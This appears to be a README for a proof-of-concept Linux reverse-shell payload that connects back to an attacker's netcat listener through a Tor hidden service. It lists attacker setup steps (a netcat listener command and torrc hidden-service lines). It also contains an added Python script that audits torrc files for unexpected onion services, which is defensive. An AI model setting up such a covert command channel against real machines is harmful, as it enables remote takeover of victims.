A simple PoC of a Linux payload that connects back to a listening netcat via Tor and lets the attacker run commands on the target machine.
This is free software, and you are welcome to redistribute it under certain conditions.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.

For details, see the COPYING file.

Although this software is a PoC, it can easily be run as a local Metasploit plugin by copying the Ruby files into the corresponding Metasploit data directory.
Assuming that the victim is already running Tor, to set up the environment an attacker would have to:

- Install Tor on the attacker machine, e.g. on Debian-like systems:

```sh
sudo apt-get install tor
```

- Set up a listening netcat locally on the attacker machine:

```sh
nc -v -l -p 1234 127.0.0.1
```

- Make the listening netcat reachable via Tor by adding a hidden service to the torrc file:

```
HiddenServiceDir /var/lib/tor/nc_hidden_service/
HiddenServicePort 1234 127.0.0.1:1234
```

- Start the Tor service on the attacker machine and read the onion hostname that Tor writes into the HiddenServiceDir configured above:

```sh
service tor start
```

- Prepare the payload accordingly.
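The torrc directives above are the part of this setup a host auditor is most likely to meet: a machine running Tor may also be serving onion services, and the HiddenServiceDir / HiddenServicePort pairs say exactly which local ports are exposed. The following added example (not part of the original PoC) parses those directives and flags services that are not on an allowlist or that forward an onion port to a non-loopback target. It assumes the documented syntax `HiddenServicePort VIRTPORT [TARGET]`, where TARGET defaults to `127.0.0.1:VIRTPORT` and may be a bare port, `HOST:PORT` or `unix:/path`; the torrc content and the `/var/lib/tor/web/` service are constructed sample data.

```python
"""Parse the HiddenServiceDir / HiddenServicePort directives of a torrc and
audit them against an allowlist of expected onion services.

Added example, not part of the original PoC. Assumption (not from the README):
each HiddenServiceDir line is followed by its HiddenServicePort lines, and a
HiddenServicePort argument is 'VIRTPORT [TARGET]' with TARGET defaulting to
127.0.0.1:VIRTPORT and otherwise being 'PORT', 'HOST:PORT' or 'unix:/path'.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set, Tuple

# Constructed sample torrc; the first block mirrors the README's netcat listener,
# the second block is invented to exercise the default target and an off-host target.
SAMPLE_TORRC = """\
SocksPort 9050
HiddenServiceDir /var/lib/tor/nc_hidden_service/
HiddenServicePort 1234 127.0.0.1:1234

HiddenServiceDir /var/lib/tor/web/
HiddenServicePort 80               # target defaults to 127.0.0.1:80
HiddenServicePort 443 10.0.0.5:443 # forwards to another host on the LAN
"""

Target = Tuple[str, Optional[int]]  # (host or unix:path, port or None for sockets)


@dataclass
class HiddenService:
    directory: str
    ports: List[Tuple[int, Target]] = field(default_factory=list)


def parse_port_mapping(value: str) -> Tuple[int, Target]:
    """Turn the argument of a HiddenServicePort line into (virtual_port, target)."""
    fields = value.split()
    if not fields:
        raise ValueError("HiddenServicePort without a virtual port")
    virtual = int(fields[0])
    if len(fields) == 1:
        return virtual, ("127.0.0.1", virtual)  # Tor's default target
    target = fields[1]
    if target.startswith("unix:"):
        return virtual, (target, None)  # unix domain socket target
    if ":" in target:
        host, _, port = target.rpartition(":")
        return virtual, (host, int(port))
    return virtual, ("127.0.0.1", int(target))  # bare port means loopback


def parse_torrc(text: str) -> List[HiddenService]:
    """Return every hidden service block found in the torrc text, in file order."""
    services: List[HiddenService] = []
    current: Optional[HiddenService] = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "hiddenservicedir":
            current = HiddenService(directory=value)
            services.append(current)
        elif key == "hiddenserviceport":
            if current is None:
                raise ValueError("HiddenServicePort before any HiddenServiceDir")
            current.ports.append(parse_port_mapping(value))
    return services


def audit(text: str, expected_dirs: Set[str]) -> List[str]:
    """Report services missing from the allowlist and onion ports forwarded off-host."""
    findings: List[str] = []
    for svc in parse_torrc(text):
        if svc.directory not in expected_dirs:
            findings.append(f"unexpected hidden service: {svc.directory}")
        for virtual, (host, port) in svc.ports:
            if host.startswith("unix:") or host in ("127.0.0.1", "localhost", "::1"):
                continue  # local targets are the normal case
            findings.append(
                f"{svc.directory}: onion port {virtual} forwards to non-loopback {host}:{port}"
            )
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_TORRC, {"/var/lib/tor/web/"}):
        print(finding)
```

Run against a real host, the script would read `/etc/tor/torrc` instead of `SAMPLE_TORRC`; the allowlist is whatever onion services the host is documented to serve, so anything else, such as the netcat listener directory from this README, shows up as a finding.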
Note that the full scenario implies installing or compiling Tor on the victim. Similar scenarios can be deployed using other services such as SSH or Meterpreter. More detailed information can be found at Eleven Paths.